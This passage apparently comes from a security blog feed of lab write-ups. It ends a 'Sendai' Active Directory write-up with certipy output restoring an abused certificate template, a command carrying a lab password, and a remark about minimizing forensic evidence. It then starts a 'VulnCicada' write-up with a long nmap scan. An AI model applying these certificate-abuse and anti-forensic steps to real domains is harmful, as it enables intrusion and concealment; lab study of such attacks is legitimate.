[*] Wrote current configuration for &apos;SendaiComputer&apos; to &apos;SendaiComputer_9506a2c6-6d67-4177-8b68-50f3bedf034c.json&apos;
[*] Updating certificate template &apos;SendaiComputer&apos;
[*] Replacing:
[*]     nTSecurityDescriptor: b&apos;\x01\x00\x04\x9ch\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00T\x01\x08\x00\x00\x00\x05\x008\x000\x01\x00\x00\x01\x00\x00\x00h\xc9\x10\x0e\xfbx\xd2\x11\x90\xd4\x00\xc0Oy\xdcU\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08&quot;\xe4 \xea+\x00\x02\x00\x00\x05\x008\x000\x01\x00\x00\x01\x00\x00\x00h\xc9\x10\x0e\xfbx\xd2\x11\x90\xd4\x00\xc0Oy\xdcU\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08&quot;\xe4 \xea+\x03\x02\x00\x00\x05\x008\x000\x01\x00\x00\x01\x00\x00\x00h\xc9\x10\x0e\xfbx\xd2\x11\x90\xd4\x00\xc0Oy\xdcU\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08&quot;\xe4 \xea+\x07\x02\x00\x00\x00\x00$\x00\xff\x00\x0f\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08&quot;\xe4 \xea+\x00\x02\x00\x00\x00\x00$\x00\xff\x00\x0f\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08&quot;\xe4 \xea+\x07\x02\x00\x00\x00\x00$\x00\xff\x00\x0f\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08&quot;\xe4 \xea+\xf4\x01\x00\x00\x00\x00$\x00\xff\x01\x0f\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08&quot;\xe4 \xea+h\x04\x00\x00\x00\x00\x14\x00\x94\x00\x02\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00f\xae\xee\xb7\x97Z\x08&quot;\xe4 \xea+\xf4\x01\x00\x00&apos;
[*]     flags: 131680
[*]     pKIDefaultKeySpec: 1
[*]     pKIKeyUsage: b&apos;\xa0\x00&apos;
[*]     pKIMaxIssuingDepth: 0
[*]     pKICriticalExtensions: [&apos;2.5.29.15&apos;]
[*]     pKIExpirationPeriod: b&apos;\x00\x00]\xd2,\xf6\x8f\xff&apos;
[*]     pKIExtendedKeyUsage: [&apos;1.3.6.1.5.5.7.3.1&apos;, &apos;1.3.6.1.5.5.7.3.2&apos;]
[*]     pKIDefaultCSPs: [&apos;1,Microsoft RSA SChannel Cryptographic Provider&apos;]
[*]     msPKI-Enrollment-Flag: 32
[*]     msPKI-Private-Key-Flag: 16842752
[*]     msPKI-Certificate-Name-Flag: 134217728
[*]     msPKI-Minimal-Key-Size: 4096
[*]     msPKI-Certificate-Application-Policy: [&apos;1.3.6.1.5.5.7.3.1&apos;, &apos;1.3.6.1.5.5.7.3.2&apos;]
Are you sure you want to apply these changes to &apos;SendaiComputer&apos;? (y/N): y
[*] Successfully updated &apos;SendaiComputer&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Verification of Template Restoration&lt;/h2&gt;
&lt;p&gt;A final verification confirmed that the certificate template was restored to its original secure configuration, with the ESC1 vulnerability no longer present:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ certipy-ad find -u &quot;clifford.davey&quot; -p &quot;RFmoB2WplgE_3p&quot;  -dc-ip 10.129.140.152 -dc-host dc.sendai.vl  -ns 10.129.140.152 -enabled -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 16 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for &apos;sendai-DC-CA&apos; via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for &apos;sendai-DC-CA&apos;
[*] Checking web enrollment for CA &apos;sendai-DC-CA&apos; @ &apos;dc.sendai.vl&apos;
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sendai-DC-CA
    DNS Name                            : dc.sendai.vl
    Certificate Subject                 : CN=sendai-DC-CA, DC=sendai, DC=vl
    Certificate Serial Number           : 326E51327366FC954831ECD5C04423BE
    Certificate Validity Start          : 2023-07-11 09:19:29+00:00
    Certificate Validity End            : 2123-07-11 09:29:29+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : SENDAI.VL\Administrators
      Access Rights
        ManageCa                        : SENDAI.VL\Administrators
                                          SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
        ManageCertificates              : SENDAI.VL\Administrators
                                          SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
        Enroll                          : SENDAI.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : SendaiComputer
    Display Name                        : SendaiComputer
    Certificate Authorities             : sendai-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Template Created                    : 2023-07-11T12:46:12+00:00
    Template Last Modified              : 2025-09-17T22:42:07+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Domain Computers
                                          SENDAI.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : SENDAI.VL\Administrator
        Full Control Principals         : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
                                          SENDAI.VL\ca-operators
        Write Owner Principals          : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
                                          SENDAI.VL\ca-operators
        Write Dacl Principals           : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Enterprise Admins
                                          SENDAI.VL\ca-operators
        Write Property Enroll           : SENDAI.VL\Domain Admins
                                          SENDAI.VL\Domain Computers
                                          SENDAI.VL\Enterprise Admins
    [+] User Enrollable Principals      : SENDAI.VL\ca-operators
                                          SENDAI.VL\Domain Computers
    [+] User ACL Principals             : SENDAI.VL\ca-operators
    [!] Vulnerabilities
      ESC4                              : User has dangerous permissions.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The template had been successfully restored to its original state, showing only the ESC4 vulnerability (which required the CA-OPERATORS group membership to exploit). This completed the attack chain while minimizing forensic evidence of the compromise.&lt;/p&gt;
</content:encoded></item><item><title>VulnCicada</title><link>https://dahmanisec.me/posts/vulncicada/vulncicada/</link><guid isPermaLink="true">https://dahmanisec.me/posts/vulncicada/vulncicada/</guid><description>VulnLab Windows Active Directory machine demonstrating NFS misconfigurations and credential exposure</description><pubDate>Tue, 09 Sep 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Nmap Scan&lt;/h2&gt;
&lt;p&gt;First, I performed a comprehensive Nmap scan to identify open ports and running services on the target machine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nmap -sV -vv -p- -A --min-rate 3000 -oN vulnCicada_tcp.txt 10.129.132.149
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;Nmap scan report for 10.129.132.149 (10.129.132.149)
Host is up, received echo-reply ttl 127 (0.051s latency).
Scanned at 2025-09-06 19:28:11 +01 for 180s
Not shown: 65512 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-06 18:29:04Z)
111/tcp   open  rpcbind       syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-06T18:16:42
| Not valid after:  2026-09-06T18:16:42
| MD5:   bf1f:ac81:fa7b:442e:e647:11bc:c4e5:402a
| SHA-1: 48f0:b214:2fb7:0f23:cdb1:612e:cd14:535e:7bb8:4712
| -----BEGIN CERTIFICATE-----
| MIIGQjCCBSqgAwIBAgITdAAAAFfXs2UyuT/hcAAcAAAAVzANBgkqhkiG9w0BAQsF
| ADBKMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZjaWNhZGEx
| HDAaBgNVBAMTE2NpY2FkYS1EQy1KUFEyMjUtQ0EwHhcNMjUwOTA2MTgxNjQyWhcN
| MjYwOTA2MTgxNjQyWjAeMRwwGgYDVQQDExNEQy1KUFEyMjUuY2ljYWRhLnZsMIIB
| IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA19ty7oM3TNC0ehF2+bEt8Uwv
| JMx76rw1n85QYczi25aWnUJ2+G2yThM2AQYXMC1kMMum8LAoc+WDBSrp+6pW3vVA
| MEbnHDZBrsN1CW0WCyv2bPfMquIxOLUr9yZEp9ziInuKnmgn+aIcPRMG8kVbk7Er
| A+OkLuG1JD3F6f4/qSPL10ZfQQH9+SjmJdxh5BWvbEnDBX+1iF7BADmPEmdXK1cV
| Zxe2x+OGXhd5bBZOugRpc5/riblqi5+6Xj/hUsSNwCDJUDMGnCNUbw9sgWr3vJa1
| bBTSM7NdJq/GkdhhuTQrnTHDk5CoAxAfNmiSJicjvVonqDXufDcATEwbIOgR0QID
| AQABo4IDSzCCA0cwLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0
| AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAOBgNV
| HQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgICAIAwDgYI
| KoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJYIZIAWUD
| BAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzBMBgkrBgEEAYI3
| GQIEPzA9oDsGCisGAQQBgjcZAgGgLQQrUy0xLTUtMjEtNjg3NzAzMzkzLTE0NDc3
| OTU4ODItNjYwOTgyNDctMTAwMDA/BgNVHREEODA2oB8GCSsGAQQBgjcZAaASBBBJ
| dTpUavdLT4B84ikMU0MFghNEQy1KUFEyMjUuY2ljYWRhLnZsMB0GA1UdDgQWBBT3
| Mja2q44Gjn47J8gYGNsdE+lmPDAfBgNVHSMEGDAWgBQdBflF4nQ7T40THWEd2S3w
| WfbrQTCB1QYDVR0fBIHNMIHKMIHHoIHEoIHBhoG+bGRhcDovLy9DTj1jaWNhZGEt
| REMtSlBRMjI1LUNBKDI4KSxDTj1EQy1KUFEyMjUsQ049Q0RQLENOPVB1YmxpYyUy
| MEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9
| Y2ljYWRhLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmpl
| Y3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBwwYIKwYBBQUHAQEEgbYwgbMw
| gbAGCCsGAQUFBzAChoGjbGRhcDovLy9DTj1jaWNhZGEtREMtSlBRMjI1LUNBLENO
| PUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D
| b25maWd1cmF0aW9uLERDPWNpY2FkYSxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/
| b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
| AAOCAQEAFA9MrBFpy3kQsVTyHs3r85gphK6OUeuWl20FW6khDvfJvDnJGHIsOM5e
| mvQ8+T8xGOMFhjEIt2Su8+RbJRzQmdRL9ImQflwErB/Vlss6amE4usJJiAJ3O5Z0
| 1wCX3ouSr3zDAvzyUAPYTC8UdwaxuHMzlYFeoSE6n8rSqN4qYcyMI+uD3sjoQWdY
| Csg0IxE3hUdCEWmL8l/7S1/8jejKw4HTWcdt+S1x+OvtO7dxWQulEY+xkuonImqR
| L2qB1815e9XnwmXo6ufA77A3m2EIyBDTjyIQelEakj5tg3KXJPxpuUgdZIyv2Hgi
| XGvs9UGoPQMmT63GzeHPo8VRJ9x0zg==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-06T18:16:42
| Not valid after:  2026-09-06T18:16:42
| MD5:   bf1f:ac81:fa7b:442e:e647:11bc:c4e5:402a
| SHA-1: 48f0:b214:2fb7:0f23:cdb1:612e:cd14:535e:7bb8:4712
| -----BEGIN CERTIFICATE-----
| MIIGQjCCBSqgAwIBAgITdAAAAFfXs2UyuT/hcAAcAAAAVzANBgkqhkiG9w0BAQsF
| ADBKMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZjaWNhZGEx
| HDAaBgNVBAMTE2NpY2FkYS1EQy1KUFEyMjUtQ0EwHhcNMjUwOTA2MTgxNjQyWhcN
| MjYwOTA2MTgxNjQyWjAeMRwwGgYDVQQDExNEQy1KUFEyMjUuY2ljYWRhLnZsMIIB
| IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA19ty7oM3TNC0ehF2+bEt8Uwv
| JMx76rw1n85QYczi25aWnUJ2+G2yThM2AQYXMC1kMMum8LAoc+WDBSrp+6pW3vVA
| MEbnHDZBrsN1CW0WCyv2bPfMquIxOLUr9yZEp9ziInuKnmgn+aIcPRMG8kVbk7Er
| A+OkLuG1JD3F6f4/qSPL10ZfQQH9+SjmJdxh5BWvbEnDBX+1iF7BADmPEmdXK1cV
| Zxe2x+OGXhd5bBZOugRpc5/riblqi5+6Xj/hUsSNwCDJUDMGnCNUbw9sgWr3vJa1
| bBTSM7NdJq/GkdhhuTQrnTHDk5CoAxAfNmiSJicjvVonqDXufDcATEwbIOgR0QID
| AQABo4IDSzCCA0cwLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0
| AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAOBgNV
| HQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgICAIAwDgYI
| KoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJYIZIAWUD
| BAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzBMBgkrBgEEAYI3
| GQIEPzA9oDsGCisGAQQBgjcZAgGgLQQrUy0xLTUtMjEtNjg3NzAzMzkzLTE0NDc3
| OTU4ODItNjYwOTgyNDctMTAwMDA/BgNVHREEODA2oB8GCSsGAQQBgjcZAaASBBBJ
| dTpUavdLT4B84ikMU0MFghNEQy1KUFEyMjUuY2ljYWRhLnZsMB0GA1UdDgQWBBT3
| Mja2q44Gjn47J8gYGNsdE+lmPDAfBgNVHSMEGDAWgBQdBflF4nQ7T40THWEd2S3w
| WfbrQTCB1QYDVR0fBIHNMIHKMIHHoIHEoIHBhoG+bGRhcDovLy9DTj1jaWNhZGEt
| REMtSlBRMjI1LUNBKDI4KSxDTj1EQy1KUFEyMjUsQ049Q0RQLENOPVB1YmxpYyUy
| MEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9
| Y2ljYWRhLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmpl
| Y3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBwwYIKwYBBQUHAQEEgbYwgbMw
| gbAGCCsGAQUFBzAChoGjbGRhcDovLy9DTj1jaWNhZGEtREMtSlBRMjI1LUNBLENO
| PUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D
| b25maWd1cmF0aW9uLERDPWNpY2FkYSxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/
| b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
| AAOCAQEAFA9MrBFpy3kQsVTyHs3r85gphK6OUeuWl20FW6khDvfJvDnJGHIsOM5e
| mvQ8+T8xGOMFhjEIt2Su8+RbJRzQmdRL9ImQflwErB/Vlss6amE4usJJiAJ3O5Z0
| 1wCX3ouSr3zDAvzyUAPYTC8UdwaxuHMzlYFeoSE6n8rSqN4qYcyMI+uD3sjoQWdY
| Csg0IxE3hUdCEWmL8l/7S1/8jejKw4HTWcdt+S1x+OvtO7dxWQulEY+xkuonImqR
| L2qB1815e9XnwmXo6ufA77A3m2EIyBDTjyIQelEakj5tg3KXJPxpuUgdZIyv2Hgi
| XGvs9UGoPQMmT63GzeHPo8VRJ9x0zg==
|_-----END CERTIFICATE-----
2049/tcp  open  nlockmgr      syn-ack ttl 127 1-4 (RPC #100021)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-06T18:16:42
| Not valid after:  2026-09-06T18:16:42
| MD5:   bf1f:ac81:fa7b:442e:e647:11bc:c4e5:402a
| SHA-1: 48f0:b214:2fb7:0f23:cdb1:612e:cd14:535e:7bb8:4712
| -----BEGIN CERTIFICATE-----
| MIIGQjCCBSqgAwIBAgITdAAAAFfXs2UyuT/hcAAcAAAAVzANBgkqhkiG9w0BAQsF
| ADBKMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZjaWNhZGEx
| HDAaBgNVBAMTE2NpY2FkYS1EQy1KUFEyMjUtQ0EwHhcNMjUwOTA2MTgxNjQyWhcN
| MjYwOTA2MTgxNjQyWjAeMRwwGgYDVQQDExNEQy1KUFEyMjUuY2ljYWRhLnZsMIIB
| IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA19ty7oM3TNC0ehF2+bEt8Uwv
| JMx76rw1n85QYczi25aWnUJ2+G2yThM2AQYXMC1kMMum8LAoc+WDBSrp+6pW3vVA
| MEbnHDZBrsN1CW0WCyv2bPfMquIxOLUr9yZEp9ziInuKnmgn+aIcPRMG8kVbk7Er
| A+OkLuG1JD3F6f4/qSPL10ZfQQH9+SjmJdxh5BWvbEnDBX+1iF7BADmPEmdXK1cV
| Zxe2x+OGXhd5bBZOugRpc5/riblqi5+6Xj/hUsSNwCDJUDMGnCNUbw9sgWr3vJa1
| bBTSM7NdJq/GkdhhuTQrnTHDk5CoAxAfNmiSJicjvVonqDXufDcATEwbIOgR0QID
| AQABo4IDSzCCA0cwLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0
| AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAOBgNV
| HQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgICAIAwDgYI
| KoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJYIZIAWUD
| BAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzBMBgkrBgEEAYI3
| GQIEPzA9oDsGCisGAQQBgjcZAgGgLQQrUy0xLTUtMjEtNjg3NzAzMzkzLTE0NDc3
| OTU4ODItNjYwOTgyNDctMTAwMDA/BgNVHREEODA2oB8GCSsGAQQBgjcZAaASBBBJ
| dTpUavdLT4B84ikMU0MFghNEQy1KUFEyMjUuY2ljYWRhLnZsMB0GA1UdDgQWBBT3
| Mja2q44Gjn47J8gYGNsdE+lmPDAfBgNVHSMEGDAWgBQdBflF4nQ7T40THWEd2S3w
| WfbrQTCB1QYDVR0fBIHNMIHKMIHHoIHEoIHBhoG+bGRhcDovLy9DTj1jaWNhZGEt
| REMtSlBRMjI1LUNBKDI4KSxDTj1EQy1KUFEyMjUsQ049Q0RQLENOPVB1YmxpYyUy
| MEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9
| Y2ljYWRhLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmpl
| Y3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBwwYIKwYBBQUHAQEEgbYwgbMw
| gbAGCCsGAQUFBzAChoGjbGRhcDovLy9DTj1jaWNhZGEtREMtSlBRMjI1LUNBLENO
| PUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D
| b25maWd1cmF0aW9uLERDPWNpY2FkYSxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/
| b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
| AAOCAQEAFA9MrBFpy3kQsVTyHs3r85gphK6OUeuWl20FW6khDvfJvDnJGHIsOM5e
| mvQ8+T8xGOMFhjEIt2Su8+RbJRzQmdRL9ImQflwErB/Vlss6amE4usJJiAJ3O5Z0
| 1wCX3ouSr3zDAvzyUAPYTC8UdwaxuHMzlYFeoSE6n8rSqN4qYcyMI+uD3sjoQWdY
| Csg0IxE3hUdCEWmL8l/7S1/8jejKw4HTWcdt+S1x+OvtO7dxWQulEY+xkuonImqR
| L2qB1815e9XnwmXo6ufA77A3m2EIyBDTjyIQelEakj5tg3KXJPxpuUgdZIyv2Hgi
| XGvs9UGoPQMmT63GzeHPo8VRJ9x0zg==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:DC-JPQ225.cicada.vl
| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-06T18:16:42
| Not valid after:  2026-09-06T18:16:42
| MD5:   bf1f:ac81:fa7b:442e:e647:11bc:c4e5:402a
| SHA-1: 48f0:b214:2fb7:0f23:cdb1:612e:cd14:535e:7bb8:4712
| -----BEGIN CERTIFICATE-----
| MIIGQjCCBSqgAwIBAgITdAAAAFfXs2UyuT/hcAAcAAAAVzANBgkqhkiG9w0BAQsF
| ADBKMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZjaWNhZGEx
| HDAaBgNVBAMTE2NpY2FkYS1EQy1KUFEyMjUtQ0EwHhcNMjUwOTA2MTgxNjQyWhcN
| MjYwOTA2MTgxNjQyWjAeMRwwGgYDVQQDExNEQy1KUFEyMjUuY2ljYWRhLnZsMIIB
| IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA19ty7oM3TNC0ehF2+bEt8Uwv
| JMx76rw1n85QYczi25aWnUJ2+G2yThM2AQYXMC1kMMum8LAoc+WDBSrp+6pW3vVA
| MEbnHDZBrsN1CW0WCyv2bPfMquIxOLUr9yZEp9ziInuKnmgn+aIcPRMG8kVbk7Er
| A+OkLuG1JD3F6f4/qSPL10ZfQQH9+SjmJdxh5BWvbEnDBX+1iF7BADmPEmdXK1cV
| Zxe2x+OGXhd5bBZOugRpc5/riblqi5+6Xj/hUsSNwCDJUDMGnCNUbw9sgWr3vJa1
| bBTSM7NdJq/GkdhhuTQrnTHDk5CoAxAfNmiSJicjvVonqDXufDcATEwbIOgR0QID
| AQABo4IDSzCCA0cwLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0
| AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAOBgNV
| HQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgICAIAwDgYI
| KoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJYIZIAWUD
| BAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzBMBgkrBgEEAYI3
| GQIEPzA9oDsGCisGAQQBgjcZAgGgLQQrUy0xLTUtMjEtNjg3NzAzMzkzLTE0NDc3
| OTU4ODItNjYwOTgyNDctMTAwMDA/BgNVHREEODA2oB8GCSsGAQQBgjcZAaASBBBJ
| dTpUavdLT4B84ikMU0MFghNEQy1KUFEyMjUuY2ljYWRhLnZsMB0GA1UdDgQWBBT3
| Mja2q44Gjn47J8gYGNsdE+lmPDAfBgNVHSMEGDAWgBQdBflF4nQ7T40THWEd2S3w
| WfbrQTCB1QYDVR0fBIHNMIHKMIHHoIHEoIHBhoG+bGRhcDovLy9DTj1jaWNhZGEt
| REMtSlBRMjI1LUNBKDI4KSxDTj1EQy1KUFEyMjUsQ049Q0RQLENOPVB1YmxpYyUy
| MEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9
| Y2ljYWRhLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmpl
| Y3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBwwYIKwYBBQUHAQEEgbYwgbMw
| gbAGCCsGAQUFBzAChoGjbGRhcDovLy9DTj1jaWNhZGEtREMtSlBRMjI1LUNBLENO
| PUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D
